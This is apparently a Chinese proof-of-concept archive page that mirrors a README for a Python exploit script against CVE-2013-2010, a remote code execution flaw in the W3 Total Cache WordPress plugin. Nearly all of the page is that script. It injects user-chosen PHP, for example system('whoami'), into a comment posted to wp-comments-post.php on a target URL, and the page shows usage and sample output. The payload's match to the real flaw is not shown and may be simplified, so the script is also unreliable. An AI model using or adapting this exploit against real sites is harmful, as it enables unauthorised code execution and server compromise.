关联漏洞
描述
Remote code execution running on w3 total cache cve 2013-2010
介绍
# w3-total-cache-cve-2013-2010
Remote code execution running on w3 total cache cve 2013-2010
Usage:
python3 w3tc_rce_exploit.py -u http://example.com -p "system('whoami');"
Output:
[*] Targeting: http://example.com
[+] Payload sent successfully.
[+] Check the target for execution of the payload.
-----------
import requests
import argparse
def exploit_rce(target_url, payload):
"""Exploit the RCE vulnerability by sending a crafted comment."""
# Construct the URL for posting a comment
post_url = f"{target_url}/wp-comments-post.php"
# Prepare the payload for the comment
data = {
'author': 'attacker',
'email': 'attacker@example.com',
'url': 'http://example.com',
'comment': payload,
'submit': 'Submit Comment',
'post_id': 1 # Assuming post ID 1 exists; adjust as necessary
}
try:
# Send the POST request
response = requests.post(post_url, data=data)
if response.status_code == 200:
print("[+] Payload sent successfully.")
print("[+] Check the target for execution of the payload.")
else:
print("[-] Failed to send payload.")
print(f"Status Code: {response.status_code}")
except Exception as e:
print(f"Error during exploitation: {str(e)}")
def main():
parser = argparse.ArgumentParser(description='Exploit CVE-2013-2010 in W3 Total Cache')
parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
parser.add_argument('-p', '--payload', required=True, help='PHP code to execute')
args = parser.parse_args()
target_url = args.url.rstrip('/')
# Construct a malicious payload (e.g., a simple PHP command)
php_payload = f"<?php {args.payload} ?>"
print(f"[*] Targeting: {target_url}")
exploit_rce(target_url, php_payload)
if __name__ == "__main__":
main()
文件快照
[4.0K] /data/pocs/2ceb6053160c7bf49e26a3740a3df3fbb858c869
└── [1.9K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。